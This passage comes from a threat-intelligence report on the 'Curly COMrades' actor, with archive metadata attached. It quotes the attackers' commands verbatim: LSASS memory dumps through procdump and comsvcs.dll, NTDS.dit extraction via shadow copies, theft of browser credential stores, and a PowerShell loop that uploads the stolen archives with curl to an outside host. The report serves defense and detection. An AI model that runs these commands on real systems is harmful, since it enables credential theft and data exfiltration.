Sometimes, their approach appeared to\r\nrely on attempting multiple techniques until successful access was achieved. Tools and methods observed included\r\nMimikatz, various LOLBins such as comsvcs.dll, procdump, DCSync attacks, and NTDS database extraction via Volume Shadow\r\nCopy. \r\nCredentials - Dump \r\nC:\\programdata\\procdump.exe -accepteula -ma 676 C:\\\\programdata\\\\lss.dmp \r\ncmd.exe /Q /c for /f \"tokens=1,2 delims= \" ^%A in ('\"tasklist /fi \"Imagename eq lsass.exe\" | find \"lsass\"\"') do\r\nrundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, #+0000^24 ^%B \\\\Windows\\\\Temp\\\\iK5.lnk full \r\nIn several instances, custom tools were observed being used to extract LSASS memory. However, these tools were assessed\r\nas unlikely to have been developed in-house and more plausibly adapted from existing open-source proof-of-concept\r\nimplementations. One such instance involved attempts to deploy executables on a compromised system. The selected file\r\npaths included C:\\ProgramData\\TB.exe, C:\\ProgramData\\TSB.exe, and C:\\ProgramData\\TBD.exe. \r\nSubsequent analysis of these samples indicated that they had been built from the TrickDump project. Notably, one of the\r\nbinaries was found to implement the same AES encryption scheme for the memory dump used in the MucorAgent, with the\r\nencryption key and initialization vector (IV) set to identical values. The specific key observed—q4v1toz93nklpr4i—bears a\r\nnotable resemblance to the keys employed in the payload encryption used by MucorAgent. \r\nAnother custom tool intended for LSASS memory dumping was identified as C:\\ProgramData\\Results.exe (MD5:\r\n5ed6b17103b231e9ff2abda1094083e3). This binary contains shellcode embedded within the .rdata section, which is\r\nexecuted after modifying memory protections via the VirtualProtect() Windows API. 
Upon execution, the shellcode loads\r\ndbgcore.dll and invokes MiniDumpWriteDump() to generate a memory dump of the lsass.exe process, which is then saved\r\nas lsass.dmp. \r\nAttempts to extract the ntds.dit file were carried out periodically by manually copying both the ntds.dit and the SYSTEM\r\nhive from a shadow copy of the system drive. Notably, following the issuance of these commands, the batch file\r\nC:\\ProgramData\\rar.bat archived all files located in C:\\Users\\Public\\Documents. This batch file was observed being used on\r\nmultiple occasions across several systems, suggesting that C:\\Users\\Public\\Documents served as a common staging location\r\nroutinely utilized by the attackers. \r\nCredentials – Extraction \r\ncmd.exe /C vssadmin list shadows \u003e C:\\\\Windows\\\\Temp\\\\eEYBczZA.tmp 2\u003e\u00261 \r\ncmd.exe /C vssadmin create shadow /for=C: \u003e C:\\\\Windows\\\\Temp\\\\oIkXWolk.tmp 2\u003e\u00261 \r\ncmd.exe /C copy /y \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit\r\nc:\\Users\\Public\\documents \u003e C:\\\\Windows\\\\Temp\\\\TJuAVkwx.tmp 2\u003e\u00261 \r\ncmd.exe /C copy /y \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\system32\\config\\system\r\nc:\\Users\\Public\\documents \u003e C:\\\\Windows\\\\Temp\\\\CXkSutIz.tmp 2\u003e\u00261 \r\nCmd.exe /C c:\\programdata\\rar.bat \u003e C:\\\\Windows\\\\Temp\\\\Qtodwvvz.tmp 2\u003e\u00261 \r\ncmd.exe /c \"c:\\programdata\\Rar.exe\" a c:\\programdata\\\u003credacted\u003e.rar c:\\users\\Public\\documents\\\\ -u -r -y -m5 -inul -\r\nhpJ347Hw -v2048k \r\nAdditional commands related to credential access were identified during the investigation. These included the use of reg.exe\r\nto inspect the HKLM\\Security\\Policy\\Secrets registry path, as well as the copying of the Chrome login data folder and\r\nFirefox’s key4.db file. 
These actions were likely intended to facilitate the exfiltration of stored credentials: \r\nCredentials – Apps Credentials Extraction \r\ncmd.exe /C reg query HKLM\\\\Security\\\\Policy\\\\Secrets\\\\_SC_MSSQLSERVER\\\\CurrVal \u003e\r\nC:\\\\Windows\\\\Temp\\\\KQPGjxdB.tmp 2\u003e\u00261 \r\ncmd.exe /C reg query HKLM\\\\Security\\\\Policy\\\\Secrets\\\\_SC_MSSQLSERVER \u003e C:\\\\Windows\\\\Temp\\\\AVFVmJxu.tmp\r\n2\u003e\u00261 \r\ncmd.exe /C reg query HKLM\\\\Security\\\\Policy\\\\Secrets \u003e C:\\\\Windows\\\\Temp\\\\UHopbQrR.tmp 2\u003e\u00261 \r\ncmd.exe /C copy /Y \"C:\\\\users\\\\\u003credacted\u003e\\\\AppData\\\\Local\\\\Google\\\\chrome\\\\User data\\\\Default\\\\login Data\"\r\nC:\\\\programdata\\\\L \u003e C:\\\\Windows\\\\Temp\\\\oIREnOOg.tmp 2\u003e\u00261 \r\ncmd.exe /C reg query HKEY_USERS\\\\\u003cSID\u003e\\\\environment \u003e C:\\\\Windows\\\\Temp\\\\SvkVsqpN.tmp 2\u003e\u00261 \r\ncmd.exe /C copy /y \"C:\\\\users\\\\\u003credacted\u003e\\\\appdata\\\\roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\a3nhez3h.default-release-1629700254215\\\\key4.db\" C:\\\\programdata\\\\k \u003e C:\\\\WINDOWS\\\\Temp\\\\BHMhyyOi.tmp 2\u003e\u00261 \r\nExfiltration \r\nExfiltration attempts were observed relatively infrequently and appeared to involve manual intervention by the attackers,\r\nlikely to minimize operational noise. 
\r\nA recurring pattern identified across these attempts was the execution of rar.bat, which archived the contents of the\r\nC:\\Users\\Public\\Documents directory—a location previously noted as a staging area during NTDS dump operations.\r\nAdditionally, commands were observed for copying the contents of the scripts folder from the SYSVOL share of a domain.\r\nTraces of archive files bearing names suggestive of internal application storage were also detected, reflecting a broad scope\r\nof interest on the part of the attackers. \r\nExfiltration \r\ncmd.exe /C dir \\\\\u003cdomain controller\u003e\\SYSVOL \u003e c:\\\\Programdata\\\\WindowsUpdateTask_y.tmp 2\u003e\u00261 \r\ncmd.exe /C dir \\\\\u003cdomain controller\u003e\\SYSVOL\\\u003cdomain\u003e\\scripts \u003e c:\\\\Programdata\\\\WindowsUpdateTask_p.tmp\r\n2\u003e\u00261 \r\ncmd.exe /C echo copy /y \\\\\u003cdomain controller\u003e\\SYSVOL\\\u003cdomain\u003e\\scripts\\* c:\\users\\Public\\documents\\ | cmd \u003e\r\nc:\\\\Programdata\\\\WindowsUpdateTask_m.tmp 2\u003e\u00261 \r\n\"c:\\Program Files\\WinRar\\Rar.exe\" a c:\\programdata\\\u003credacted\u003e.rar \"c:\\users\\public\\Documents\" -u -r -y -m5 -inul -\r\nhpB6uqLX3 -v1024k \r\ncmd.exe /C curl -k https://ipinfo.io/json \u003e c:\\\\Programdata\\\\WindowsUpdateTask_f.tmp 2\u003e\u00261 \r\ncmd.exe /C echo powershell.exe -ep bypass -f c:\\\\programdata\\\\run.ps1 | cmd \u003e\r\nc:\\\\Programdata\\\\WindowsUpdateTask_P.tmp 2\u003e\u00261 \r\nThe archives from the staging directory were then exfiltrated using curl.exe, an operation that was automated through the\r\nexecution of a PowerShell script named run.ps1: \r\n$path = \"c:\\programdata\"; $files = Get-ChildItem -Path $path -Filter \"*.rar\" | Sort-Object;  \r\nforeach ($file in $files.FullName) { Start-Sleep -s 5; curl.exe -k -X POST -H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64;\r\nrv:91.0) Gecko/20100101 Firefox/91.0\" --upload-file $file https://\u003credacted\u003e[.]by/contact_us; }  
\r\nStart-Sleep -s 20;  \r\ncmd.exe /c del /f /q c:\\programdata*.rar \r\nThe archives were uploaded to a site assessed to be compromised—an approach consistently observed in other attacker\r\nactivities, including the deployment of SOCKS proxy relays and likely command-and-control infrastructure associated with\r\nMucorAgent. Finally, data was exfiltrated to compromised servers. \r\nConclusion \r\nThe campaign analyzed revealed a highly persistent and adaptable threat actor employing a wide range of known and\r\ncustomized techniques to establish and maintain long-term access within targeted environments. The attackers relied heavily\r\non publicly available tools, open-source projects, and LOLBins, showing a preference for stealth, flexibility, and minimal\r\ndetection rather than exploiting novel vulnerabilities. \r\nPersistence was achieved through valid credentials, multiple proxy relays, scheduled tasks, and in some cases, the use of\r\nremote monitoring software such as Remote Utilities. Sophisticated malware such as MucorAgent, recently discovered\r\nduring the investigation, exemplifies the technical capabilities of the actor. This modular implant employed COM hijacking,\r\nAES-encrypted PowerShell payloads, and covert exfiltration mechanisms using tools like curl.exe disguised as legitimate\r\nprocesses. \r\nCredential access was pursued through various means, including Mimikatz, comsvcs.dll abuse, LSASS memory dumping,\r\nand NTDS.dit extraction using shadow copies. Evidence also pointed to the use of adapted open-source tools such as\r\nTrickDump and custom shellcode loaders designed to evade detection. \r\nExfiltration activity was deliberately sparse and manually executed to avoid triggering alerts. 
Files of interest—including\r\ncredentials, domain information, and internal application data—were staged in publicly accessible locations on victim\r\nmachines, commonly C:\\Users\\Public\\Documents, and then archived and exfiltrated to attacker-controlled servers. \r\nThe overall behavior indicates a methodical approach in which the attackers combined standard attack techniques with\r\ntailored implementations to blend into legitimate system activity. Their operations were characterized by repeated trial-and-error, use of redundant methods, and incremental setup steps - all aimed at maintaining a resilient and low-noise foothold\r\nacross multiple systems. \r\nRecommendations \r\nOur investigations often reveal a critical security gap: organizations often can't effectively detect or respond to the \"noise\"\r\nsophisticated threat actors generate. This is typically due to either a lack of modern EDR/XDR sensors, leaving them blind\r\nto suspicious activities, or, even with these platforms, an absence of dedicated security operations to act on alerts. This dual\r\ndeficiency in both technology and operational readiness allows inevitable security incidents to become preventable security\r\nbreaches. \r\nImplement Comprehensive XDR for Behavior Anomaly Detection \r\nA robust security platform like GravityZone with strong EDR/XDR capabilities is essential. This includes analyzing\r\nprocess anomalies and suspicious network activity, focusing on proxy tools (like Resocks, SSH, Stunnel) and\r\nobfuscated malware that threat actors use to mask their C2. \r\nActively monitor for attempts to extract the NTDS database from domain controllers and dump LSASS memory. \r\nIdentify and block network-based attacks, remote command execution (like Atexec), and credential-stuffing\r\nattempts. 
\r\nContinuously monitor system and registry changes to uncover anomalous persistence, like CLSID hijacking. \r\nDetect unusual data transfers by common tools like curl.exe to external, potentially compromised, web servers,\r\nlooking for suspicious traffic patterns or C2 communications blending with legitimate web traffic. \r\nProactively Limit LOLBins and RMM Abuse \r\nUse behavioral analytics to identify deviations from normal user and system activity, which are often indicative of\r\n\"Living off the Land\" binaries (LOLBins) or legitimate Remote Monitoring and Management (RMM) tool abuse. \r\nTry to limit an attacker's ability to exploit these commonly abused tools by restricting their access or execution when\r\nnot necessary with new solutions like GravityZone PHASR. \r\nConsider Managed Detection and Response (MDR) for Operational Gaps \r\nFor organizations without a dedicated Security Operations Center (SOC) team or operating with a lean security staff,\r\nadopting Managed Detection and Response (MDR) services offers an effective solution. MDR effectively acts as an\r\nextension of an in-house team, providing 24/7 expert threat hunting, rapid incident response, and continuous\r\nmonitoring. \r\nMDR services can specifically detect stealthy tactics such as credential theft and novel persistence methods,\r\nincluding leveraging CTI-driven threat hunting and prioritized monitoring of critical assets like domain controllers. \r\nBy focusing on these areas, organizations can build a more resilient security posture, capable of detecting and responding to\r\neven the most covert and persistent adversaries. 
\r\nIOCs \r\nFile Information \r\nFile Paths \r\nProxy Servers \r\nScheduled Tasks 
\r\nWindows Services\r\nSource: https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds"
	],
	"report_names": [
		"curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds"
	],
	"threat_actors": [
		{
			"id": "8cb98420-1ff5-4a85-977b-b4e063eec334",
			"created_at": "2026-01-17T02:00:03.200683Z",
			"updated_at": "2026-04-10T02:00:03.896419Z",
			"deleted_at": null,
			"main_name": "Curly COMrades",
			"aliases": [],
			"source_name": "MISPGALAXY:Curly COMrades",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434650,
	"ts_updated_at": 1775792160,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d6b6a4666e1efbf60c50e0c656e5a0079fba7447.pdf",
		"text": "https://archive.orkl.eu/d6b6a4666e1efbf60c50e0c656e5a0079fba7447.txt",
		"img": "https://archive.orkl.eu/d6b6a4666e1efbf60c50e0c656e5a0079fba7447.jpg"
	}
}